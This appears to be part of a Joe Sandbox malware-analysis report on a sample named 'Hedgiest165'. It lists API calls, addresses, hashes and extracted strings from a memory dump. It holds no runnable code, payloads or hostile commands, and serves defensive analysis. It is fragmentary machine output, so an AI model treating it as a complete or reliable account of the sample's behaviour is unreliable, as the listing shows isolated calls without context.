                                                                        • Opcode Fuzzy Hash: 3329e545d5ec6aba1881b0fa4301c309bd0113fbb75ee4600ef066edaf7bf9ee
                                                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0044A6EB
                                                                        • memset.MSVCRT ref: 0044A6FB
                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: gj
                                                                        • API String ID: 1297977491-4203073231
                                                                        • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                        • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                        APIs
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                        • free.MSVCRT ref: 0040E9D3
                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$free
                                                                        • String ID:
                                                                        • API String ID: 2241099983-0
                                                                        • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                        • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                        APIs
                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                        • malloc.MSVCRT ref: 004174BD
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                        • free.MSVCRT ref: 004174E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                        • String ID:
                                                                        • API String ID: 4053608372-0
                                                                        • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                        • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                        • String ID:
                                                                        • API String ID: 4247780290-0
                                                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                        • memset.MSVCRT ref: 004450CD
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                        • String ID:
                                                                        • API String ID: 1471605966-0
                                                                        • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                        • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                        APIs
                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                        • String ID: \StringFileInfo\
                                                                        • API String ID: 102104167-2245444037
                                                                        • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                        • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                        APIs
                                                                        • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                        • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                        • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem$PlacementWindow
                                                                        • String ID: AE
                                                                        • API String ID: 3548547718-685266089
                                                                        • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                        • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                        • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                        • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _memicmpwcslen
                                                                        • String ID: @@@@$History
                                                                        • API String ID: 1872909662-685208920
                                                                        • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                        • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                        • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                        • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004100FB
                                                                        • memset.MSVCRT ref: 00410112
                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                        • String ID: </%s>
                                                                        • API String ID: 3400436232-259020660
                                                                        • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                        • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040E770
                                                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendmemset
                                                                        • String ID: AE$"
                                                                        • API String ID: 568519121-1989281832
                                                                        • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                        • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                        • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                        • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040D58D
                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                        • String ID: caption
                                                                        • API String ID: 1523050162-4135340389
                                                                        • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                        • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                        APIs
                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                        • String ID: MS Sans Serif
                                                                        • API String ID: 210187428-168460110
                                                                        • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                        • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcsicmpmemset
                                                                        • String ID: edit
                                                                        • API String ID: 2747424523-2167791130
                                                                        • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                        • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                        • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                        • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                        APIs
                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp
                                                                        • String ID:
                                                                        • API String ID: 3384217055-0
                                                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$memcpy
                                                                        • String ID:
                                                                        • API String ID: 368790112-0
                                                                        • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                        • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                        • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                        • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                        APIs
                                                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                        Strings
                                                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                        • API String ID: 1297977491-2063813899
                                                                        • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                        • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                        • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                        • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040560C
